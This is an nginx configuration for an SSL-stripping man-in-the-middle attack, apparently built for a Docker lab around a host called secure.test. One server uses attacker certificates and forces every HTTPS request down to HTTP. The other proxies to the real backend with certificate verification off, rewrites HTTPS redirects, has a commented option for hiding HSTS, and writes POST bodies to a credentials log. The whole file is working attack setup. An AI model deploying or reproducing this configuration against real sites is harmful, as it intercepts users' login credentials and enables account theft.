# Log format for the sniffed data
log_format sniffer '$remote_addr - [$time_local] "HOST: $host" "POST_DATA: $request_body"';

# 1. HTTP Server (Port 80) - The Trap & Logger
server {
    listen 80;
    server_name secure.test;

    # Capture credentials HERE (When the attack succeeds)
    access_log /var/log/nginx/creds.log sniffer;

    location / {
        proxy_pass https://172.20.0.10;
        proxy_ssl_verify off;
        # proxy_hide_header Strict-Transport-Security; # Hide HSTS
        proxy_redirect https:// http://;             # Rewrite redirects
    }
}

# 2. HTTPS Server (Port 443) - The "Downgrade Cannon"
server {
    listen 443 ssl;
    server_name secure.test;

    # Use the fake certs (Make sure you generated them in the Dockerfile step!)
    ssl_certificate /etc/nginx/certs/attacker.crt;
    ssl_certificate_key /etc/nginx/certs/attacker.key;

    # DO NOT LOG credentials here (to prove the redirect logic works)
    access_log off;

    # Force redirect to insecure HTTP
    location / {
        return 307 http://$host$request_uri;
    }
}